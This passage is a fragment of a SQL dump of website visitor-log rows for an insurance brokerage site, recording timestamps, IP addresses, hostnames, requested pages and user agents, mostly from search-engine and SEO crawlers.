http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21161,'0b_e3817746a5ef201d0779cc27c39a568e','1461601938','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21164,'0b_0f280e8488af7e2166aaebea4014a398','1461603056','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21167,'0b_ac4f96b6b527c52d593728b88cfc3913','1461605361','157.55.39.57','msnbot-157-55-39-57.search.msn.com','/agent-tools/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(21170,'0b_3b4e9b4086e848ed130802c17dbde834','1461606262','5.9.98.130','static.130.98.9.5.clients.your-server.de','/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21171,'0b_3b4e9b4086e848ed130802c17dbde834','1461606265','5.9.98.130','static.130.98.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21174,'0b_3b4e9b4086e848ed130802c17dbde834','1461606267','5.9.98.130','static.130.98.9.5.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21176,'0b_3b4e9b4086e848ed130802c17dbde834','1461606270','5.9.98.130','static.130.98.9.5.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21177,'0b_3b4e9b4086e848ed130802c17dbde834','1461606272','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21179,'0b_3b4e9b4086e848ed130802c17dbde834','1461606274','5.9.98.130','static.130.98.9.5.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21180,'0b_3b4e9b4086e848ed130802c17dbde834','1461606276','5.9.98.130','static.130.98.9.5.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21182,'0b_3b4e9b4086e848ed130802c17dbde834','1461606278','5.9.98.130','static.130.98.9.5.clients.your-server.de','/carriers/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21183,'0b_3b4e9b4086e848ed130802c17dbde834','1461606281','5.9.98.130','static.130.98.9.5.clients.your-server.de','/contact/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21186,'0b_3b4e9b4086e848ed130802c17dbde834','1461606283','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-status/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21189,'0b_3b4e9b4086e848ed130802c17dbde834','1461606285','5.9.98.130','static.130.98.9.5.clients.your-server.de','/forms/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21192,'0b_3b4e9b4086e848ed130802c17dbde834','1461606289','5.9.98.130','static.130.98.9.5.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21195,'0b_3b4e9b4086e848ed130802c17dbde834','1461606291','5.9.98.130','static.130.98.9.5.clients.your-server.de','/term-quotes/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21198,'0b_3b4e9b4086e848ed130802c17dbde834','1461606294','5.9.98.130','static.130.98.9.5.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21200,'0b_3b4e9b4086e848ed130802c17dbde834','1461606297','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21203,'0b_3b4e9b4086e848ed130802c17dbde834','1461606300','5.9.98.130','static.130.98.9.5.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21204,'0b_3b4e9b4086e848ed130802c17dbde834','1461606302','5.9.98.130','static.130.98.9.5.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21206,'0b_3b4e9b4086e848ed130802c17dbde834','1461606304','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21209,'0b_3b4e9b4086e848ed130802c17dbde834','1461606306','5.9.98.130','static.130.98.9.5.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21210,'0b_3b4e9b4086e848ed130802c17dbde834','1461606309','5.9.98.130','static.130.98.9.5.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21212,'0b_3b4e9b4086e848ed130802c17dbde834','1461606314','5.9.98.130','static.130.98.9.5.clients.your-server.de','/members/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21213,'0b_3b4e9b4086e848ed130802c17dbde834','1461606317','5.9.98.130','static.130.98.9.5.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)','','',0,'','','de','','','','','','','3','0',0),(21215,'0b_1814fc3971bcd7407ee50ae991bab27d','1461607521','128.177.161.166','128.177.161.166','/pay','Mozilla/5.0 (Linux; Android 4.2.2; en-us; SAMSUNG SGH-M819N Build/JDQ39) AppleWebKit/535.19 (KHTML, like Gecko) Version/1.0 Chrome/18.0.1025.308 Mobile Safari/535.19','','',0,'Android 4','Safari 1','us','','','','','','','0','0',0),(21218,'0b_cf780384bcb4251c0193e4fe081b58b9','1461609428','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21221,'0b_7e5b0518e12f9edaca86380dfc41b3b1','1461610211','70.199.97.89','89.sub-70-199-97.myvzw.com','/','Mozilla/5.0 (Linux; Android 5.0; SM-N900V Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36','','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(21222,'0b_541bef15a038c0df608b02ce2a3e7106','1461612158','157.55.39.18','msnbot-157-55-39-18.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21225,'0b_1cdc2881dd0f4c1dd7643fae7d1d4bcc','1461612341','169.54.233.124','7c.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(21228,'0b_f9e7ba2e9b6da1e9ac0d4fb5980de936','1461615095','66.249.66.12','crawl-66-249-66-12.googlebot.com','/illustration.htm','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(21231,'0b_c0d69a1031a677dffa3a69f95dea72d7','1461620091','51.255.51.69','69.ip-51-255-51.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21233,'0b_c0d69a1031a677dffa3a69f95dea72d7','1461620095','51.255.51.69','69.ip-51-255-51.eu','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21234,'0b_c0d69a1031a677dffa3a69f95dea72d7','1461620097','51.255.51.69','69.ip-51-255-51.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21237,'0b_c0d69a1031a677dffa3a69f95dea72d7','1461620099','51.255.51.69','69.ip-51-255-51.eu','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21239,'0b_c0d69a1031a677dffa3a69f95dea72d7','1461620102','51.255.51.69','69.ip-51-255-51.eu','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21242,'0b_c0d69a1031a677dffa3a69f95dea72d7','1461620107','51.255.51.69','69.ip-51-255-51.eu','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(21245,'0b_81a339fe367c2767062a7ab92253c057','1461620292','157.55.39.232','msnbot-157-55-39-232.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21246,'0b_c9f7c463e094c1b24fae789b49fb2842','1461621086','88.198.16.153','static.88-198-16-153.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21249,'0b_c9f7c463e094c1b24fae789b49fb2842','1461621088','88.198.16.153','static.88-198-16-153.clients.your-server.de','/?p=288','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21251,'0b_c9f7c463e094c1b24fae789b49fb2842','1461621090','88.198.16.153','static.88-198-16-153.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21252,'0b_c9f7c463e094c1b24fae789b49fb2842','1461621092','88.198.16.153','static.88-198-16-153.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(21254,'0b_dfa1b8eabf67df8609a9938e2ad69a41','1461622696','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21255,'0b_ba8f9b0135868be6290156d01e1668e0','1461622809','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://pozdrawleniya.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(21257,'0b_ba8f9b0135868be6290156d01e1668e0','1461622809','5.248.253.133','5-248-253-133-broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)','http://pozdrawleniya.com/','',0,'Windows','IE 6','','','','','','','','0','0',0),(21258,'0b_4c59ca28c3c87285852689ebb12c9939','1461623591','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(21260,'0b_4c59ca28c3c87285852689ebb12c9939','1461623595','141.8.143.235','spider-141-8-143-235.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(21261,'0b_0e99d9c0b2811e97b56df017af90350f','1461623849','66.249.83.133,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(21263,'0b_3d6aa1ef089c51f2119eab281171ee33','1461623849','66.249.83.150,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(21264,'0b_9767daab9b24d86dbf576cf8ce236fc8','1461624673','69.30.210.242','69.30.210.242','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(21266,'0b_9767daab9b24d86dbf576cf8ce236fc8','1461624684','69.30.210.242','69.30.210.242','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(21267,'0b_9767daab9b24d86dbf576cf8ce236fc8','1461624696','69.30.210.242','69.30.210.242','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(21270,'0b_9767daab9b24d86dbf576cf8ce236fc8','1461624710','69.30.210.242','69.30.210.242','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(21273,'0b_9767daab9b24d86dbf576cf8ce236fc8','1461624722','69.30.210.242','69.30.210.242','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(21276,'0b_9767daab9b24d86dbf576cf8ce236fc8','1461624733','69.30.210.242','69.30.210.242','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(21279,'0b_0d7fc1eb3aea34706994aabe043e9e19','1461626607','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(21281,'0b_8ebeb9211961277444c9a94398cba80d','1461630082','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(21282,'0b_8ebeb9211961277444c9a94398cba80d','1461630084','178.255.215.70','crawl06.exabot.com','/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(21285,'0b_5882648ba3db2624e2800712bbf77db4','1461630448','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21287,'0b_f2fb1d3bd10160308bc5f11bed36f85b','1461633664','157.55.39.232','msnbot-157-55-39-232.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21290,'0b_d22fc75ae8965bfcb3c611bf1821ed12','1461634108','216.153.28.200','host200-28-153-216.isdn.net','/','Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Iceweasel/30.0','','',0,'Linux','Firefox 30','us','','','','','','','0','0',0),(21291,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634667','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/case-status/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21294,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634682','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/agent-tools/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21297,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634700','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/insentives/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21299,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634803','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/term-quotes/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21300,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634811','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/igo/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21302,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634815','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/licensing-contracting/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21305,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634823','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/carriers/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21306,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634865','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/forms/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21309,'0b_f55b407f10f1b1c1fc8ab0d8f200dff8','1461634868','71.189.164.218','static-71-189-164-218.lsanca.fios.frontiernet.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','','','','GimmeUSAbot','','','','0','0',0),(21311,'0b_a33b558c15cc1a4a452d48abd458f2e4','1461636624','66.249.66.8','crawl-66-249-66-8.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21314,'0b_4478bdcc8698d3f442865cdde1e718f3','1461636625','66.249.66.12','crawl-66-249-66-12.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(21317,'0b_4df12a5a022f7c6ec54c64c8e0bf30fa','1461639737','5.56.63.54','5.56.63.54','/','CATExplorador/1.0beta (sistemes at domini dot cat; http://domini.cat/catexplorador.html)','http://empiremaintenanceandconstruction.com','',0,'','','ca','','','CATExplorador','','','','0','0',0),(21318,'0b_dea4ad4841da9fd53bc1418e732d83f3','1461640361','66.249.66.12','crawl-66-249-66-12.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21321,'0b_dea4ad4841da9fd53bc1418e732d83f3','1461640361','66.249.66.18','crawl-66-249-66-18.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21324,'0b_d1e02c1df342057d2ce172fd693aa815','1461642401','162.243.103.236','162.243.103.236','/robots.txt','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(21326,'0b_d1e02c1df342057d2ce172fd693aa815','1461642412','162.243.103.236','162.243.103.236','/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(21327,'0b_d1e02c1df342057d2ce172fd693aa815','1461642423','162.243.103.236','162.243.103.236','/igo/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21329,'0b_d1e02c1df342057d2ce172fd693aa815','1461642436','162.243.103.236','162.243.103.236','/forms/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21332,'0b_d1e02c1df342057d2ce172fd693aa815','1461642447','162.243.103.236','162.243.103.236','/contact/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21335,'0b_d1e02c1df342057d2ce172fd693aa815','1461642458','162.243.103.236','162.243.103.236','/carriers/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21338,'0b_d1e02c1df342057d2ce172fd693aa815','1461642469','162.243.103.236','162.243.103.236','/about-us/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21341,'0b_d1e02c1df342057d2ce172fd693aa815','1461642479','162.243.103.236','162.243.103.236','/register/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21344,'0b_d1e02c1df342057d2ce172fd693aa815','1461642490','162.243.103.236','162.243.103.236','/insentives/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21347,'0b_d1e02c1df342057d2ce172fd693aa815','1461642501','162.243.103.236','162.243.103.236','/case-status/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21350,'0b_d1e02c1df342057d2ce172fd693aa815','1461642511','162.243.103.236','162.243.103.236','/agent-tools/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21351,'0b_d1e02c1df342057d2ce172fd693aa815','1461642522','162.243.103.236','162.243.103.236','/?page_id=169','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(21353,'0b_d1e02c1df342057d2ce172fd693aa815','1461642534','162.243.103.236','162.243.103.236','/term-quotes/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21356,'0b_d1e02c1df342057d2ce172fd693aa815','1461642546','162.243.103.236','162.243.103.236','/licensing-contracting/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21359,'0b_d1e02c1df342057d2ce172fd693aa815','1461642557','162.243.103.236','162.243.103.236','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(21360,'0b_d1e02c1df342057d2ce172fd693aa815','1461642567','162.243.103.236','162.243.103.236','/members/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'','','us','','','spbot','','','','3','0',0),(21362,'0b_d1e02c1df342057d2ce172fd693aa815','1461642578','162.243.103.236','162.243.103.236','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/','',0,'','','us','','','spbot','','','','3','0',0),(21365,'0b_d1e02c1df342057d2ce172fd693aa815','1461642589','162.243.103.236','162.243.103.236','/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/meet-the-eib-team/','',0,'','','us','','','spbot','','','','3','0',0),(21366,'0b_d1e02c1df342057d2ce172fd693aa815','1461642600','162.243.103.236','162.243.103.236','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21369,'0b_d1e02c1df342057d2ce172fd693aa815','1461642612','162.243.103.236','162.243.103.236','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21371,'0b_d1e02c1df342057d2ce172fd693aa815','1461642623','162.243.103.236','162.243.103.236','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21374,'0b_d1e02c1df342057d2ce172fd693aa815','1461642634','162.243.103.236','162.243.103.236','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(21377,'0b_85d1bf500e4176bc504191b484667613','1461645395','157.55.39.137','msnbot-157-55-39-137.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21378,'0b_3fe2c5d6d1d61dcd9e63ce46d9125e12','1461646375','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21380,'0b_2ccd791591afe92c20ae907d2cd1db7c','1461649638','180.76.15.6','baiduspider-180-76-15-6.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(21383,'0b_e9a879b09b1f1394f829d3c7cc513f22','1461649716','180.76.15.31','baiduspider-180-76-15-31.crawl.baidu.com','/term-quotes/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(21384,'0b_2708b22facca608c21d2a38e8b5a1f41','1461650610','130.185.155.82','130.185.155.82','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 